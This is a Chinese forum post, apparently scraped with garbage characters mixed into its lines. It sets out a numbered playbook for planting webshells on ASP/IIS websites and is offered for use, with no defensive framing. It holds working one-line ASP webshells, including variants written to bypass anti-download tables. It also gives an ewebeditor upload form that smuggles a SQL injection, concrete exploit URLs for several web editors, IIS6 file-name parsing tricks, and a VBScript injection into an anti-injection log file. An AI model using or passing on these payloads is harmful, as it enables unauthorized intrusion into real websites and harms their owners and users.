- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式' V O0 j! h/ x) b1 q( e
7 M7 W: \, E7 h% n, f! O: g2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp
6 S$ Q: O6 @! i2 Z* y7 ]! ?+ g* n/ T
! p" h/ v, Q- c2 o1 g5 w0 k3.上传漏洞:
' ~1 I! i, g' ^: L/ Y$ l: @5 h& a
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00/ |$ [! f H' G' t$ t! \
& ]! c- Q1 A& J& F4 n- \
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件: W; v& }* W& l9 Y3 v# l
3 J- j r5 E5 h雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp. x C% g/ M0 t+ |/ G; y' ?9 h6 G
然后在上传文件里面填要传的图片格式的ASP木马
8 z; v9 B' D/ a1 K) f9 p就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
; q1 c5 S: W/ j% `4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
6 ?4 r3 V5 t) i: e7 B8 O1 t
' P: o C. f( x* c% q3 u<html>+ b- C* | K( }+ F5 k3 ~- d, h
<head>2 d3 X% d o& {* b3 _0 l
<title>ewebeditor upload.asp上传利用</title>
- s1 D! Q. |" I9 Q</head>
j( r( M0 M' b7 F0 S! g" U<body>
/ Q q5 I6 p2 B$ S3 T<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
$ y% g8 e3 s5 f3 s4 z<input type=file name=uploadfile size=100><br><br>2 a7 {* M# {% T
<input type=submit value=Fuck> V, r2 K+ ^' x w- V. g6 T: F5 W
</form>
5 ` N4 M M9 j! p% g3 j' r0 ~</body>% D$ s7 k' z, Z* Q* c g
</form>7 @" H2 k/ Q4 s" B& j0 q
</html>4 J+ u& u* I6 [% K: r
" w# S6 A. g$ A9 i
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问! f: }$ X5 o' Y9 @: l- s
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
+ x1 M- p3 M- K9 P o9 c
' g& h+ o+ R* S- i/ M利用windows2003解析。建立zjq.asp的文件夹
) T7 h& W$ Z5 J9 `9 _3 O* X4 \
( g( b5 X& l: ~8 Q" @* o' H6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
' d. X6 @) F2 p4 }
8 k: C! y7 k7 R: N0 [7.cuteeditor:类似ewebeditor
3 E- N& @) [$ a+ _3 w1 H7 L; D x
; |/ ^# y* {3 E5 g8.htmleditor:同上
; L2 T% R+ F) [% p. e! ?
$ B h0 a! Q7 t t5 P9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
5 O3 J- g( I8 w. k; {9 F1 G; O
; d! b- u, m8 l- ~5 B<%execute request("value")%><%'<% loop <%:%>4 z! _/ E& }" C; G
' Z: b0 N6 ~% H8 |" t; q- U<%'<% loop <%:%><%execute request("value")%>
" u h% Z6 ]$ S, x% b9 C3 X: O6 g/ \$ a& K. w
<%execute request("value")'<% loop <%:%>
1 W) T& ]% L! M4 z: y I. |) H9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞 r: z' N/ w0 I" O# {4 t0 z
7 t3 a0 J6 X9 ]. q, o
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
3 X# g# v7 k5 N$ _
" u) Q, c5 B# I) D1 Q5 O11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
8 X% g( G2 s* v" G& t7 Y* ]" s( o6 s8 F+ x; B& x
解析漏洞得到webshell' l; r y) h6 O9 [, e* Y% I$ W( i) Z3 e" }
8 x+ B: Y7 ]; D! l
12.mssql差异备份,日志备份,前提需知道web路径
/ g- J8 j1 i& L4 l6 M5 f
2 j: B, Y1 @# X! G7 j/ R! D6 {13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell3 S9 T- p( G* ~$ r1 ?. A K
5 v5 c( o& R( O7 Z7 B& p
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell+ s: E5 Z" I, B
& q% Z* r3 r2 W6 v6 T: p( s15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可. Y" p6 K9 A; e
! P0 Q3 ~1 D' {! v5 L# F
以上只是本人的一些拙见,并不完善,以后想到了再继续添加, ^6 _6 N& j) g, ]6 q2 m+ p
不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|